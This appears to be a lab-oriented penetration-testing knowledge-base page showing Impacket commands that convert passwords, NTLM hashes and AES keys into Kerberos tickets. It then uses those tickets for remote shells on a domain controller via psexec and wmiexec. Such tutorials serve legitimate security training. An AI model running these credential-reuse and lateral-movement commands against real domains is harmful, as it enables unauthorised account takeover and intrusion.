Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 03. Kerberos / Tickets / Converting

Password and NTLM to CCACHE

When we have a password, NTLM hash, or AES key, we can request a TGT directly from Linux and save it as ccache. This is the common remote Kerberos workflow with Impacket.

Password to ccache:

getTGT.py ootw.local/student:'student' -dc-ip 10.10.10.200
export KRB5CCNAME=FILE:$(pwd)/student.ccache
klist

NTLM hash to ccache:

getTGT.py -hashes :64fbae31cc352fc26af97cbdef151e03 ootw.local/student -dc-ip 10.10.10.200
export KRB5CCNAME=FILE:$(pwd)/student.ccache
klist

LM:NTLM format:

getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:edf3fec5cfe3db436b4f1d92e70eda3f ootw.local/student -dc-ip 10.10.10.200

AES key to ccache:

getTGT.py -aesKey 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef ootw.local/student -dc-ip 10.10.10.200

Use the ticket with Impacket:

psexec.py -k -no-pass ootw.local/student@dc01.ootw.local -dc-ip 10.10.10.200
wmiexec.py -k -no-pass ootw.local/student@dc01.ootw.local -dc-ip 10.10.10.200
smbclient.py -k -no-pass ootw.local/student@dc01.ootw.local -dc-ip 10.10.10.200

Validate with NetExec:

nxc smb 10.10.10.200 -d ootw.local -u student -k --use-kcache
nxc ldap 10.10.10.200 -d ootw.local -u student -k --use-kcache

Password to NTLM:

iconv -f ASCII -t UTF-16LE <(printf 'CLEAR_TEXT_PASSWD') | openssl dgst -md4

Python NTLM with Impacket:

python3 -c "from impacket.ntlm import compute_nthash; print(compute_nthash('CLEAR_TEXT_PASSWD').hex())"